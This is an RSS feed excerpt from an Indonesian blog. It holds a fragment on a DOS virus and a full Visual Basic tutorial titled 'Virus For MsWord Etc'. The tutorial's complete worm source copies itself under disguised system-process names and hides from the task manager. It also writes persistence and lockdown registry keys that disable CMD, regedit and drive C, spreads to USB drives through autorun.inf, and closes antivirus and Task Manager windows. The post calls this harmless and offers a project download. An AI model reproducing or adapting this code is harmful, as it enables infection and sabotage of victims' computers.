&lt;p align=&quot;center&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Listing. 4.4. Rutin Cetak String&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;left&quot;&gt;Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte&lt;br&gt;
Dengan tambahan rutin untuk menampilkan string :&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;justify&quot;&gt;Modification of 44 Virus&lt;br&gt;
© 2000,iwing[indovirus]&lt;br&gt;
-For Educational Only –&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;mulai : mov ah,09 ; Dos service 09h = Cetak String&lt;br&gt;
lea dx,msg ; dx berisi pesan yang akan dicetak&lt;br&gt;
int 21h ; Dos intrupt&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;</description>
            <pubDate>Thu, 07 Jul 2011 05:29:20 +0100</pubDate>
        </item>
        <item>
            <title>Virus For MsWord Etc</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/virus-for-msword-etc</link>
            <description>&lt;p&gt;Program kita kali ini adalah membuat Virus sederhana yaitu hanya 
mengganggu Microsoft Office Word dan Excel.Misalkan user membuka Word 
maka pada kertas tempat mengetik sudah muncul pesan dari Virus demikian 
pula jika membuka Excel maka pesan akan diberikan virus pada cell Excel.
 Sederhana sekali ya..ya memang virus ini tidak merusak 
dokumen/file-file dan tidak mengahpus file-file apapun jadi virus yang 
sangat baik hati..he..he..Jika anda ingin menambahkan fiture-fiture yang
 kejam silahkan saja tapi disini/virus ini tidak saya tuliskan bagaimana
 melakukan format atau delete file ataupun fiture penyusupan lainnya 
(sekarang belum saatnya).Silahkan dicoba dijamin 100% tidak ada data 
yang dihapus, ini hanya sebuah virus permainan saja kok..berani mencoba?&lt;br&gt;
Yang dibutuhkan dalam pembuatan project ini adlah : 5 buah timer dan 1 drivelistbox&lt;br&gt;
Pada proyek kali ini kita dapat belajar mengenai Windows Api 
Sendmessage, registry, dan Otomatisasi pada Word serta Excel. Semoga 
bermanfaat.&lt;/p&gt;
&lt;p&gt;Masukan semua code di bawah ini pada form&lt;br&gt;
==========================================&lt;br&gt;
Private Declare Function FindWindow Lib “user32″ Alias “FindWindowA” 
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long 
‘pencari Kleas dan Window Name Suatu File&lt;br&gt;
Private Declare Function SendMessage Lib “user32″ Alias “SendMessageA” 
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As
 Any) As Long ‘sendmessage&lt;br&gt;
Private Declare Function GetDriveType&amp;amp; Lib “Kernel32″ Alias “GetDriveTypeA” (ByVal nDrive As String) ‘ penghandel flashdisk&lt;br&gt;
Private Declare Function ExitWindowsEx Lib “user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long ‘exit windows&lt;br&gt;
Private Const WM_CLOSE = &amp;amp;H10&lt;br&gt;
Private Const EWX_LOGOFF = 0&lt;br&gt;
Private Const EWX_SHUTDOWN = 1&lt;br&gt;
Private Const EWX_REBOOT = 2&lt;br&gt;
Private Const EWX_FORCE = 4&lt;br&gt;
Private Const EWX_POWEROFF = 8&lt;/p&gt;
&lt;p&gt;Option Explicit&lt;br&gt;
Dim FWnd&lt;br&gt;
Dim obj As Object&lt;br&gt;
Dim doc As Object&lt;br&gt;
Dim WrkBook As Object&lt;br&gt;
Dim WrkSheet As Object&lt;br&gt;
Dim i As Integer&lt;br&gt;
Dim RegRun&lt;br&gt;
Dim FolderStartUp&lt;br&gt;
Dim FolderMyDocuments&lt;br&gt;
Dim FolderTemplates&lt;br&gt;
Dim FolderNetHood&lt;br&gt;
Dim FolderPrintHood&lt;br&gt;
Dim FolderFavorites&lt;br&gt;
Dim FolderSendTo&lt;br&gt;
Dim FolderPrograms&lt;br&gt;
Dim FlashDisk&lt;/p&gt;
&lt;p&gt;Private Sub Form_Load()&lt;br&gt;
On Error Resume Next&lt;br&gt;
‘acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi&lt;br&gt;
Randomize&lt;br&gt;
Me.Caption = Int(Rnd * 2221189331445#) ‘silahkan masukan angka sesuka anda&lt;br&gt;
‘menggandakan diri&lt;br&gt;
GandakefolderIstimewa&lt;br&gt;
Me.Visible = False&lt;br&gt;
App.TaskVisible = False ‘virus tidak terlihat di task manager&lt;br&gt;
InfeksiRegistry&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub BuatWord()&lt;br&gt;
On Error Resume Next&lt;br&gt;
Set obj = CreateObject(“word.application”)&lt;br&gt;
Set doc = CreateObject(“word.application”)&lt;br&gt;
Set doc = obj.Documents.Add&lt;br&gt;
doc.Content = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub BuatXls()&lt;br&gt;
On Error Resume Next&lt;br&gt;
Set obj = CreateObject(“excel.application”)&lt;br&gt;
Set WrkBook = obj.workbooks.Add&lt;br&gt;
Set WrkSheet = WrkBook.worksheets.Add&lt;br&gt;
WrkSheet.Cells(15, 4) = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub InfeksiRegistry()&lt;br&gt;
On Error Resume Next&lt;br&gt;
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows 
NT\CurrentVersion\Winlogon\Shell”, “Explorer.exe” &amp;amp; ” “”&quot; &amp;amp; 
FolderMyDocuments &amp;amp; “\services.exe”&quot;” ‘virus akan tetap berjalan 
pada tipe windows Safe Mode&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”,
 FolderFavorites &amp;amp; “\SalamKenal.exe” ‘virus akan tetap berjalan pada
 tipe windows Safe Mode With Command Prompt&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”,
 1, “REG_DWORD” ‘Folder Options tdk dapat diakses&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”,
 1, “REG_DWORD” ‘Folder Options tdk dapat diakses&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”,
 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file 
system&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”,
 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file 
system&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”,
 1, “REG_DWORD” ‘Disable CMD dan File .Bat&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”,
 1, “REG_DWORD” ‘Disable CMD dan File .Bat&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”,
 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan 
pengimporan file berekstensi Reg&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”,
 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan 
pengimporan file berekstensi Reg&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”,
 FolderTemplates &amp;amp; “\smss.exe” ‘smss.exe berjalan pada saat startup&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”,
 FolderSendTo &amp;amp; “\System.exe” ‘System.exe berjalan pada saat startup&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”,
 1, “REG_DWORD” ‘search pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”,
 1, “REG_DWORD” ‘Ssearch pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”,
 1, “REG_DWORD” ‘help suport pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”,
 1, “REG_DWORD” ‘help suport pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”,
 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”,
 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang&lt;br&gt;
RegRun.regwrite “HKEY_CURRENT_USER\Control Panel\Colors\WindowText”, “255 0 0″, “REG_SZ” ‘DEFAULT TEKS MENJADI MERAH&lt;br&gt;
RegRun.regwrite “HKEY_CLASSES_ROOT\Drive\shell\Scan With 
Antivirus\Command\”, FolderFavorites &amp;amp; “\SalamKenal.exe” ‘Membuat 
Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan 
Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak 
di Folder Favorite&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”,
 4, “REG_DWORD” ‘Drive C hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”,
 4, “REG_DWORD” ‘Drive C hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”,
 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”,
 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang&lt;br&gt;
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun”, 1, “REG_DWORD” ‘Autorun pada CD atau USB&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub GandaKeFlashDisk()&lt;br&gt;
On Error Resume Next&lt;br&gt;
If Dir(FlashDisk &amp;amp; “\Winlogon.exe”) &amp;lt;&amp;gt; “Winlogon.exe” Then 
‘mengecek ada atau tdknya winlogon.exe di flashdisk jika tdk ada 
kemudian&lt;br&gt;
FileCopy FolderStartUp &amp;amp; “\Winlogon.exe”, FlashDisk &amp;amp; “\Winlogon.exe”&lt;br&gt;
SetAttr FlashDisk &amp;amp; “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
End If&lt;br&gt;
BuatFileAutorunInf&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub BuatFileAutorunInf()&lt;br&gt;
‘membuat file Autorun.inf ke flashdisk yang berfungsi agar setiap 
flashdisk jika di klik dua kali/klik kanan trus klik open maka Virus 
(winlogon.exe) akan tereksekusi&lt;br&gt;
On Error Resume Next&lt;br&gt;
Open FlashDisk &amp;amp; “\Autorun.Inf” For Output As 1&lt;br&gt;
Print #1, “[AutoRun]”&lt;br&gt;
Print #1, “Icon=Winlogon.exe” ‘Agar FlashDisk Memiliki Icon Sama dengan Virus&lt;br&gt;
Print #1, “Open=Winlogon.exe”&lt;br&gt;
Print #1, “ShellExecute=Winlogon.exe”&lt;br&gt;
Print #1, “Shell\Open\Command=Winlogon.exe”&lt;br&gt;
Print #1, “Shell=Open”&lt;br&gt;
Close #1&lt;br&gt;
SetAttr FlashDisk &amp;amp; “\Autorun.Inf”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub GandakefolderIstimewa()&lt;br&gt;
On Error Resume Next&lt;br&gt;
Set RegRun = CreateObject(“WScript.Shell”)&lt;br&gt;
FolderStartUp = RegRun.specialfolders(“StartUp”)&lt;br&gt;
FolderMyDocuments = RegRun.specialfolders(“MyDocuments”)&lt;br&gt;
FolderTemplates = RegRun.specialfolders(“Templates”)&lt;br&gt;
FolderNetHood = RegRun.specialfolders(“NetHood”)&lt;br&gt;
FolderPrintHood = RegRun.specialfolders(“PrintHood”)&lt;br&gt;
FolderFavorites = RegRun.specialfolders(“Favorites”)&lt;br&gt;
FolderSendTo = RegRun.specialfolders(“SendTo”)&lt;br&gt;
FolderPrograms = RegRun.specialfolders(“Programs”)&lt;br&gt;
On Error Resume Next&lt;br&gt;
‘membuat virus dengan nama winlogon.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderStartUp &amp;amp; “\WinLogon.Exe”&lt;br&gt;
SetAttr FolderStartUp &amp;amp; “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama services.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderMyDocuments &amp;amp; “\services.Exe”&lt;br&gt;
SetAttr FolderMyDocuments &amp;amp; “\services.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama smss.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderTemplates &amp;amp; “\smss.Exe”&lt;br&gt;
SetAttr FolderTemplates &amp;amp; “\smss.Exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama csrss.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderPrintHood &amp;amp; “\csrss.Exe”&lt;br&gt;
SetAttr FolderPrintHood &amp;amp; “\csrss.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama Isass.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderNetHood &amp;amp; “\Isass.Exe”&lt;br&gt;
SetAttr FolderNetHood &amp;amp; “\Isass.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama SalamKenal.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderFavorites &amp;amp; “\SalamKenal.Exe”&lt;br&gt;
SetAttr FolderFavorites &amp;amp; “\SalamKenal.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama System.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderSendTo &amp;amp; “\System.Exe”&lt;br&gt;
SetAttr FolderSendTo &amp;amp; “\System.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama ctfmon.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderPrograms &amp;amp; “\ctfmon.Exe”&lt;br&gt;
SetAttr FolderPrograms &amp;amp; “\ctfmon.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer1_Timer() ‘Timer 1 diberi interval 5 detik&lt;br&gt;
On Error Resume Next&lt;br&gt;
FWnd = FindWindow(“OpusApp”, “Document1 – Microsoft Word”) ‘Ms Word&lt;br&gt;
If FWnd &amp;lt;&amp;gt; 0 Then&lt;br&gt;
SendMessage FWnd, WM_CLOSE, True, True&lt;br&gt;
BuatWord&lt;br&gt;
obj.Visible = True&lt;br&gt;
Timer2.Enabled = True&lt;br&gt;
Timer1.Enabled = False&lt;br&gt;
End If&lt;br&gt;
On Error Resume Next&lt;br&gt;
FWnd = FindWindow(“OpusApp”, “New Microsoft Word Document.doc – Microsoft Word”) ‘Ms Word&lt;br&gt;
If FWnd &amp;lt;&amp;gt; 0 Then&lt;br&gt;
SendMessage FWnd, WM_CLOSE, True, True&lt;br&gt;
BuatWord&lt;br&gt;
obj.Visible = True&lt;br&gt;
Timer2.Enabled = True&lt;br&gt;
Timer1.Enabled = False&lt;br&gt;
End If&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer2_Timer()&lt;br&gt;
On Error Resume Next&lt;br&gt;
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – Book1″) ‘ms excel&lt;br&gt;
If FWnd &amp;lt;&amp;gt; 0 Then&lt;br&gt;
SendMessage FWnd, WM_CLOSE, True, True&lt;br&gt;
BuatXls&lt;br&gt;
obj.Visible = True&lt;br&gt;
Timer1.Enabled = True&lt;br&gt;
Timer2.Enabled = False&lt;br&gt;
End If&lt;br&gt;
On Error Resume Next&lt;br&gt;
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – New Microsoft Excel Worksheet.xls”) ‘ms excel&lt;br&gt;
If FWnd &amp;lt;&amp;gt; 0 Then&lt;br&gt;
SendMessage FWnd, WM_CLOSE, True, True&lt;br&gt;
BuatXls&lt;br&gt;
obj.Visible = True&lt;br&gt;
Timer1.Enabled = True&lt;br&gt;
Timer2.Enabled = False&lt;br&gt;
End If&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer3_Timer()&lt;br&gt;
On Error Resume Next&lt;br&gt;
‘menutup aplikasi yang berbahaya bagi virus&lt;br&gt;
FWnd = FindWindow(“#32770″, “RUN”) ‘jendela run&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“#32770″, “System Configuration Utility”) ‘msconfig&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“#32770″, “Windows Task Manager”) ‘task manager&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“#32770″, “Avira AntiVir Personal – Free Antivirus”) ‘Avira Antivir&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“#32770″, “AntiVir Guard: Attention, Detection!”) ‘Avira Antivir&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“RegEdit_RegEdit”, vbNullString) ‘regedit.exe&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“TMainForm”, vbNullString) ‘aplikasi buatan Delphi 
(Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru 
tidak bisa dihentikan) &amp;lt;:d&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“TApplication”, vbNullString) ‘aplikasi buatan Delphi&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer4_Timer()&lt;br&gt;
‘cari flashdisk&lt;br&gt;
On Error Resume Next&lt;br&gt;
For i = 0 To Drive1.ListCount – 1&lt;br&gt;
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) &amp;lt;&amp;gt; “a” Then&lt;br&gt;
FlashDisk = (Drive1.List(i))&lt;br&gt;
Timer4.Enabled = False ‘agar lampu flashdisk tdk berkedip-kedip terlalu lama, sehingga tdk mencurigakan si empunya flashdisk&lt;br&gt;
Exit For&lt;br&gt;
End If&lt;br&gt;
Next&lt;br&gt;
GandaKeFlashDisk ‘&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer5_Timer()&lt;br&gt;
On Error Resume Next&lt;br&gt;
InfeksiRegistry&lt;br&gt;
‘Mungkin salah satu virus dihapus shg perlu selalu menggandakan diri&lt;br&gt;
GandakefolderIstimewa&lt;br&gt;
‘menyalakan timer 4&lt;br&gt;
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) &amp;lt;&amp;gt; “a” Then&lt;br&gt;
Timer4.Enabled = True&lt;br&gt;
End If&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)&lt;br&gt;
Cancel = 1&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Form_Unload(Cancel As Integer)&lt;br&gt;
Cancel = 1&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Silahkan &lt;a class=&quot;&quot; href=&quot;http://www.4shared.com/file/59775133/a79fbd16/VIRUS.html&quot;&gt;Download Project&lt;/a&gt; Di Download/Upload Gratis &lt;a class=&quot;&quot; href=&quot;http://www.4shared.com/ref/4563476/1&quot;&gt;Join 4Shared Now!&lt;/a&gt;,
 Tetapi sebelumnya jika anda berkenan berikan rating pada artikel ini 
dengan mengklik tanda bintang di bawah ini, agar saya mengetahui artikel
 yang paling menarik untuk penulisan selanjutnya. Terimakasih.&lt;/p&gt;&lt;p&gt;sumber: http://www.binushacker.net/virus-for-msword-etc.html&lt;br&gt;&lt;/p&gt;</description>
            <pubDate>Thu, 07 Jul 2011 05:26:35 +0100</pubDate>
        </item>
    </channel>
</rss>
